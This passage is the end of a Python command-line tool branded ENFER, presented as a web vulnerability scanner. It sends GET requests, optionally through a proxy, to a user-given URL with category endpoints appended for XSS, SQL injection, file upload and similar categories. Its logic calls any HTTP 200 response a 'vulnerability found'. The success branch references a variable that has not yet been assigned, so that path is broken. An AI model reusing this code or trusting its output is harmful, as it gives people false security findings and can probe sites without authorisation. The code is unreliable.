           ╚══════╝╚═╝  ╚═══╝╚═╝     ╚══════╝╚═╝  ╚═╝│.gg/enfer

'''
ascii = pystyle.Center.XCenter(logo)

def check_vulnerabilities(url, proxy=None):
    os.system('cls' if os.name == 'nt' else 'clear')
    print(ascii)
    scan_types = list(vulnerable_endpoints.keys())
    menu_text = f"{r}╔═══                                           ═══╗\n"
    for i, scan_type in enumerate(scan_types):
        menu_text += f"  {Fore.CYAN}{i + 1}. {scan_type}{Style.RESET_ALL}\n"
    menu_text += f"{r}╚═══                                           ═══╝\n"
    print(pystyle.Center.XCenter(menu_text))
    print(f'\n┌──<{pc_username}@ENFER>─[~] {y}(Enter the number corresponding to the scan type)')
    selected_option = input(f'{r}└──╼ $ {b}').lstrip("0")
    os.system('cls' if os.name == 'nt' else 'clear')
    selected_index = int(selected_option) - 1 if selected_option.isdigit() else -1
    if selected_index < 0 or selected_index >= len(scan_types):
        print(ascii)
        error_text = "[!] Invalid scan type selection."
        box_width = len(error_text) + 2

        text = pystyle.Center.XCenter(f"""{r}
        ╔{'═' * box_width}╗
        {r}  {error_text}  {r}
        ╚{'═' * box_width}╝
        """)
        print(text)
        input(f"{r}Press any key to return to the menu.")
        menu()
    selected_scan_type = scan_types[selected_index]
    endpoints = vulnerable_endpoints[selected_scan_type]

    color = {
        "XSS": Fore.YELLOW,
        "SQL Injection": Fore.BLUE,
        "Insecure Direct Object References": Fore.MAGENTA,
        "Information Disclosure": Fore.CYAN,
        "Insecure Cryptographic Storage": Fore.GREEN,
        "Unvalidated Input": Fore.RED,
        "Broken Authentication and Session Management": Fore.LIGHTYELLOW_EX,
        "Unprotected File Upload": Fore.LIGHTBLUE_EX
    }.get(selected_scan_type, Fore.WHITE)

    for endpoint in endpoints:
        full_url = url + endpoint
        try:
            os.system('cls' if os.name == 'nt' else 'clear')
            response = requests.get(full_url, proxies=proxy)
            if response.status_code == 200:
                detect_text = f"{color}[+] Vulnerability found: {full_url}{Style.RESET_ALL}"
                box_width = len(nodetect_text) - 2

                vulnu = pystyle.Center.XCenter(f"""{r}
                ╔{'═' * box_width}╗
                {r}  {nodetect_text}  {r}
                ╚{'═' * box_width}╝
                """)
                print(vulnu)
                time.sleep(1)
            else:
                nodetect_text = f"[!] No vulnerability detected: {full_url}{Style.RESET_ALL}"
                box_width = len(nodetect_text) - 2

                vulnu = pystyle.Center.XCenter(f"""{r}
                ╔{'═' * box_width}╗
                {r}  {nodetect_text}  {r}
                ╚{'═' * box_width}╝
                """)
                print(vulnu)
                time.sleep(1)
        except requests.exceptions.RequestException as e:
            print(f"Error occurred while scanning {full_url}: {str(e)}")
            
    input(f"{r}Press any key to return to the menu.")
    menu()

# Main function
def main():
    init(autoreset=True)  

    print(f'\n┌──<{pc_username}@ENFER>─[~] {y}(Enter the URL to scan)')
    url = input(f'{r}└──╼ $ {b}').lstrip("0")
    proxy_enabled = input(f"{r}Do you want to use a proxy? (y/n): ").lower() == "y"
    proxy = None
    if proxy_enabled:
        proxy_url = input("Enter the proxy URL (including scheme and port): ")
        proxy = {"http": proxy_url}
    check_vulnerabilities(url, proxy)

if __name__ == "__main__":
    main()